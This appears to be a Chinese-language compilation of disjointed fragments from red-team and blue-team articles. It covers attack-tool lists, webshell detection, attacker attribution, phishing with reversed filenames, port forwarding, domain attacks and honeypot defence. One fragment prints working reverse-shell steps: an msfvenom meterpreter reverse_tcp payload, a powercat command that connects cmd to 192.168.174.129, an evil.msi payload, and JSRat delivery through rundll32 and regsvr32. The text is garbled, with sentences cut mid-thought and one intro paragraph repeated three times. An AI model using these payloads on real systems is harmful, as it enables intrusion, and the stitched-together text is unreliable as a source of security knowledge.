本项目集成了全网优秀的攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具....etc...) ,漏洞利用工具(各大CMS利用工具、中间件利用工具等项目),内网渗透工具、应急响应工具、甲方运维工具、等其他安全资料项目,供攻防双方使用。 AlliN https://github.com/P1-Team/AlliN 一个辅助平常渗透测试项目或者攻防项目快速打点的综合工具 AWVS-GUI https://github.com/x364e3ab6 /STS2G STS2G Struts2-Scan Struts2全漏洞扫描利用工具 https://github.com/HatBoy/Struts2-Scan Struts2-Scan spring github.com/Summer177/seeyon_exp seeyon_exp 通达OA综合利用工具 https://github.com/xinyu2428/TDOA_RCE TDOA_RCE 蓝凌
2、返回包状态码为200,返回内容必定是16位的密钥 ? (2)按照kill-chain的模型,除了在webshell通信的时候进行检测,也可以在上传webshell时(即载荷投递阶段)进行检测,对冰蝎的webshell木马文件特征定制特定的检测规则。 更多细节,请参考《OpenRASP 最佳实践》[2] ? 2、RASP 技术和现有方案主要区别 首先,RASP 几乎没有误报情况。边界设备基于请求特征检测攻击,通常无法得知攻击是否成功。 (2)Linux audit日志检测 虽然冰蝎通讯流量是加密的,但落到主机侧,还是会调用系统命令,所以可以在主机审计日志层面定制检测规则,监控冰蝎对系统命令的调用。 0x04 总结 随着攻防对抗的不断升级,攻击方的手段越来越隐蔽,很多攻击流量都会进行加密,给防守方带来了较大挑战,相信后续对加密攻击流量检测的研究也会越来越多。
红队与蓝队:网络安全攻防演练的双重视角当我们谈论信息安全时,通常会首先想到防护措施——包括保护(Protection)、损害控制(Damage Control)和应急响应(Reaction)。 军事理念的网络安全实践在军事领域,通常会组建由高技能人员组成的红队(Red Team)模拟敌方进攻行为。红队成员凭借个人经验和专业技能,系统性地探索可能突破防御的有效攻击路径,这个过程类似于军事演习。 蓝队的防御使命蓝队(Blue Team)成员则专注于检测(Detect)能力的训练,通过评估和修补红队可能利用的弱点来强化防御。 蓝队负责防御体系建设,需识别红队利用人员(People)、流程(Process)、技术(Technology)三大要素中的漏洞发起的攻击。成功攻击案例会形成战术报告用于改进防御策略。 核心技术对抗蓝队常规操作包括:安全信息与事件管理(SIEM)系统监控威胁情报聚合分析系统内数据流动行为追踪(用于识别红队活动)红队则需持续研究蓝队的战术、技术和流程(TTPs),在攻防对抗中形成螺旋式提升的安全能力闭环
一、前言 对于攻防演练蓝军的伙伴们来说,最难的技术难题可能就是溯源,尤其在今天代理横行的时代更加难以去溯源攻击者。 —域名隐私保护 溯源案例:通过攻击IP历史解析记录/域名,对域名注册信息进行溯源分析 3.3.4 恶意样本 提取样本特征、用户名、ID、邮箱、C2服务器等信息—同源分析 溯源案例:样本分析过程中,发现攻击者的个人 利用条件:可以找到相关社交网站的jsonp接口泄露敏感信息,相关网站登录未注销 3.3攻击者画像 3.3.1 攻击路径 攻击目的:拿到权限、窃取数据、获取利益、DDOS等 网络代理:代理IP、跳板机、C2服务器等 3.4.2 案例二:Web入侵溯源 攻防场景:攻击者通过NDAY和0DAY漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了C&C域名的通讯。 3.4.3 案例三:蜜罐溯源 攻防场景:在企业内网部署蜜罐去模拟各种常见的应用服务,诱导攻击者攻击。
p1为监听的端口,p2为转发到的端口。 ./portmap -m 2 -p1 9999 -p2 33889 成功监听到转发出的3389端口。 设置socket5 0x04.2.4 NPS优点 1.可使用多个ket多个客户端 2.使用web界面较为简单,适合刚刚进入内网 3.有简单的流量加密 0x04.2.5 NPS使用 配置客户端 添加
大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写红队攻防相关的文章了,那么近期将带来 “红队实战攻防技术” 系列的文章。 当前行业内组织的 “红蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以红队的视角去阐述技术思想。 与常规的渗透测试相比,红队攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “红队攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 作为本系列的第一篇文章,将以一次公司红蓝对抗实战演练平台的渗透,引出一系列的知识点及渗透时的一些小Tips,希望能够对您有所帮助。 本文仅做安全研究作用,切勿违法乱纪。
文|腾讯蓝军 jumbo 红蓝对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW、WAF、IDS、IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重。 ,来达到⽂件名反转的效果, 如下图就是⼀个插⼊Rlo字符后的⽂件名,看后缀是个txt: 但是看⽂件详情⼜是个scr⽂件: 下图展示了打开⼀个看似是png图⽚后缀的⽂件,却执⾏了notepad: 2. 我们讨论下,为什么简历投递钓鱼在腾讯蓝军的远程办公安全演习、其他红蓝对抗项目中效果出类拔萃呢? 我觉得有如下几点: 1、首先,我们的邮箱从哪里来,邮箱收集可以从领英、v2ex、搜索引擎等渠道获取,那为什么会在上述地方出现邮箱地址? 已经完全“掌控”了对⽅,甚⾄对⽅在周末问我要简历时,为了防⽌客户机周末不间断的关机休眠,特地美名其⽈的说不想打扰到对⽅,等到⼯作⽇再投递相关“⽊⻢”: 三、总结 钓⻥⼿段层出不穷,了解钓⻥⼿段是在攻防演习
权限和system权限无法关闭 Windows defender 注意:以下工具和技巧皆需要Administratior权限才能成功使用 NSudoLG 工具地址:https://github.com/M2Team
MS08067红队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内容实战。
获取命令&控制通道 升级本地权限 执行本地侦查/发现 执行网络侦察/发现 进行横向渗透 升级域权限 查找和访问敏感数据 泄露敏感数据 在没有C2的情况下维持远程访问 01 准备钓鱼攻击(从公开资源) 常见的蓝队侦查和预防控制 ? 02 发送钓鱼邮件(到目标组织员工邮箱地址) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 08 执行本地侦察/发现(在员工系统上) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 11 升级域权限(通过常见的载体) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 日志记录/SIEM(安全信息和事件管理)/警报 14 无C2的情况维护远程访问(使用通用接口) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? ?
windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2: set LPORT 4444 set ExitOnSession false exploit -j -z Step 3:使用python启动一个简易的Web服务器用于托管shell.exe python2 /powercat/master/powercat.ps1'); powercat -c 192.168.174.129 -p 6666 -e cmd" -f msi > evil.msi Step 2: /JSRat.py -i 192.168.174.129 -p 5678 Step 2:访问client comand连接客户端执行命令 Step 3:将上述命令复制到目标主机上执行 rundll32. /JSRat.py -i 192.168.174.129 -p 5678 Step 2:访问client comand连接客户端执行命令 Step 3:将上述命令复制到目标主机上执行 regsvr32.
,rw,hidepid=2 /proc 该工具就什么输出都不会有,或者只有问号: 这里我们使用pspy作为辅助演示(当没设置hidepid时)。 腾讯蓝军也会持续和大家分享更多攻防知识,希望能够和大家共同成长,提高整体红蓝对抗水平。 文中涉及的技术信息,只限用于技术交流,切勿用于非法用途。欢迎探讨交流,行文仓促,不足之处,敬请不吝批评指正。 腾讯蓝军 腾讯蓝军(Tencent Force)由腾讯TEG安全平台部于2006年组建,十余年专注前沿安全攻防技术研究、实战演练、渗透测试、安全评估、培训赋能等,采用APT攻击者视角在真实网络环境开展实战演习 【附录】 附录1 红蓝对抗之windows内网渗透 附录2 pspy: https://github.com/DominicBreuker/pspy 附录3 bash: https://Linux.die.net /man/1/bash 附录4 setuid: https://man7.org/linux/man-pages/man2/setuid.2.html 附录5 创建特权容器: https://github.com
视频内容 红蓝对抗之域渗透技巧 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。 如有需要查看超清1080P版视频,可以选用以下2种方式进行查看。
一、什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 在信息安全领域中的红蓝对抗也是类似的思路,一方扮演黑客,另一方扮演防守者进行网络安全攻防演练。在演练过程中,蓝军模拟真实的攻击来评估企业现有防守体系的安全能力,红军对发现的问题做出相应的优化整改。 通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。 可以预见,越来越多的公司和团队会希望红蓝对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。 参考资料 • 柴坤哲、杨芸菲、王永涛、杨卿,《黑客大揭秘:近源渗透测试》,https://www.ituring.com.cn/book/2770 • lake2,《网络空间安全时代的红蓝对抗建设》,https
红蓝对抗之Windows内网渗透 作者 jumbo@腾讯蓝军 前言 无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。 而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。 2、将十六进制格式的密码进行Unicode编码。 同时预告一下,也算是立个flag:为了让红蓝对抗不用过于依靠个人经验和能力以及提升对抗效率,腾讯蓝军的红蓝对抗自动化工具平台正在筹建中,希望投入实战后有机会再跟大家一起交流学习。 Kerbrute: https://github.com/ropnop/kerbrute Responder: https://github.com/lgandx/Responder 相关阅读: 网络空间安全时代的红蓝对抗建设
2、异构边界防护设备 (增加入侵难度和成本) vpn和防火墙采用异构方式部署,同时在内外层vpn系统网络区域间部署大量蜜罐。 部署高交互、高仿真蜜罐,将vpn、oa系统做蜜罐备份,攻防期间替换掉真实业务域名,混淆攻击者,捕获零日漏洞。 2、配置虚拟进 完成本机的诱捕陷阱后,需要对虚拟机周围形成联动的诱捕体系,以防止攻击者绕过本机陷阱,直接对网络可达的其他主机进行渗透。可通过配置虚拟进程,模仿真实的高危服务,与真实业务共同对外发布。 5.零信任架构,保障vpn始终在线 可实现几个关键目标 1、vpn始终在线 2、安全防御足够,有效切断攻击方的攻击链条 3、运行过程灵活自动,避免运维人力大量投入。 2、基于时间维度分析 将演练前3个月至半年的访问数据进行提取,与演练开始后的数据进行对比,通过对比有效发现新增ip情况,新增部分往往包含演习攻击者ip。
作者:风起@知道创宇404实验室 时间:2021年8月9日 大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写红队攻防相关的文章了,那么近期将带来 “红队实战攻防技术” 系列的文章 当前行业内组织的 “红蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以红队的视角去阐述技术思想。 与常规的渗透测试相比,红队攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “红队攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 作为本系列的第一篇文章,将以一次公司红蓝对抗实战演练平台的渗透,引出一系列的知识点及渗透时的一些小Tips,希望能够对您有所帮助。 本文仅做安全研究作用,切勿违法乱纪。
大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写红队攻防相关的文章了,那么近期将带来 “红队实战攻防技术” 系列的文章。 当前行业内组织的 “红蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以红队的视角去阐述技术思想。 与常规的渗透测试相比,红队攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “红队攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 作为本系列的第一篇文章,将以一次公司红蓝对抗实战演练平台的渗透,引出一系列的知识点及渗透时的一些小Tips,希望能够对您有所帮助。 本文仅做安全研究作用,切勿违法乱纪。
在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。 db2_version #探测内网的db2服务,基于默认的50000端口 auxiliary/scanner/netbios/nbname #探测内网主机的 MS17-010 永恒之蓝在内网渗透中是屡试不爽的,基本上一打一大片。 但是MS17-010在实际红蓝对抗渗透中(通过代理打内网)并不好利用,MSF中自带的模块要打很多次才能成功一次,而且MSF自带的模块打sever2003的机器很容器蓝屏。 所以在真实红蓝对抗中不建议使用该漏洞,除非有百分百的把握能打成功 ? ? ?
一款CS后渗透模块插件,让大家使用一款插件就够了,本插件集大家之所长(其实就是重复造轮子了),本插件后期也会持续更新,欢迎各位老师关注!